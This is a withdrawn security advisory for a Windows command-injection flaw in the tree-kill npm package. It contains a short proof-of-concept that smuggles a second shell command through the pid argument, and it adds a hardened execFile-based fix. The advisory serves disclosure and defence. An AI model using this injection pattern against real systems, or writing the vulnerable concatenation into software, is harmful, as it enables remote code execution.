Disclosed on May 24, 2022 (updated November 08, 2023)
This vulnerability has been withdrawn from the vulnerability database on 11/8/2023 7:16:49 PM.
PGV-22381O7 is a category 4 vulnerability that affects tree-kill, versions ≤ 1.2.1
The risk assessment shows that this vulnerability is exploited by an external attacker: an unauthorized external actor who attempts to exploit this vulnerability without legitimate access.
The impact is contained to the application. Exploitation remains confined to the application and cannot affect the host environment or external systems.
The threat damage is caused by a denial of service: exploitation can completely deny access to the application, resulting in a full outage. It is caused by a data breach: exploitation can result in full access to data within the system. It is caused by data tampering: exploitation can result in modification of any data (authorized or not) within the system.
This advisory has been withdrawn because it is a duplicate of GHSA-884p-74jh-xrg2. This link is maintained to preserve external references.
A code injection vulnerability exists in tree-kill on Windows which allows remote code execution when an attacker is able to control the input into the command, which is executed without any check. The issue arises here: https://github.com/pkrumins/node-tree-kill/blob/master/index.js#L20 . While the Linux part is sanitized, the Windows one simply uses the + operator to concatenate the input into exec().
Create the following PoC file:
```js
// poc.js
var kill = require('tree-kill');
kill('3333332 & echo "HACKED" > HACKED.txt & ');
```
Execute the following commands in another terminal:
```
npm i tree-kill # Install affected module
dir # Check *HACKED.txt* doesn't exist
node poc.js # Run the PoC
dir # Now *HACKED.txt* exists :)
```
A new file called HACKED.txt will be created, containing the HACKED string.
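The concatenation pattern described above next to a hardened form, as an added example that is not code from this advisory or from the tree-kill project. All function names are hypothetical, and the string built in `unsafeCommandLine` is a reconstruction of the pattern the advisory describes, not a copy of the package source.

```javascript
// Added example; function names are hypothetical, not tree-kill's API.
const { execFile } = require('node:child_process');

// Pattern the advisory describes: the caller's value is pasted into a string
// that exec() hands to cmd.exe, so "&" in the value starts a second command.
// Shown only as a string here; it is never executed.
function unsafeCommandLine(pid) {
  return 'taskkill /pid ' + pid + ' /T /F';
}

// Accept a positive integer given as a number or a digits-only string.
// Strict matching rejects malformed input instead of silently truncating it
// the way parseInt('12 & calc') would.
function parsePid(input) {
  const text = typeof input === 'number' ? String(input) : input;
  if (typeof text !== 'string' || !/^[1-9][0-9]{0,9}$/.test(text)) {
    throw new TypeError('pid must be a positive integer');
  }
  const pid = Number(text);
  // Windows process IDs are 32-bit unsigned values.
  if (pid > 0xFFFFFFFF) {
    throw new TypeError('pid is out of range');
  }
  return pid;
}

// Arguments as an array: each element reaches taskkill as one argv entry.
function taskkillArgs(input) {
  return ['/pid', String(parsePid(input)), '/T', '/F'];
}

// Hardened call: execFile() starts taskkill directly, with no shell in between,
// and invalid input is reported through the callback before anything runs.
function killTreeWindows(input, callback) {
  let args;
  try {
    args = taskkillArgs(input);
  } catch (err) {
    return callback(err);
  }
  return execFile('taskkill', args, { windowsHide: true }, callback);
}
```

Validation and the argument array are independent layers: either one alone stops the PoC input above, and together they keep the call safe if one is later weakened.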
| Network Exposure | External: Accessible from the public internet |
| Access Interface | WebBrowser: Primarily web-based applications |
| Service Outage | Disruptive: Operations would be impacted |
| Data Breach | Disruptive: Operations would be impacted |
| Data Tampering | Disruptive: Operations would be impacted |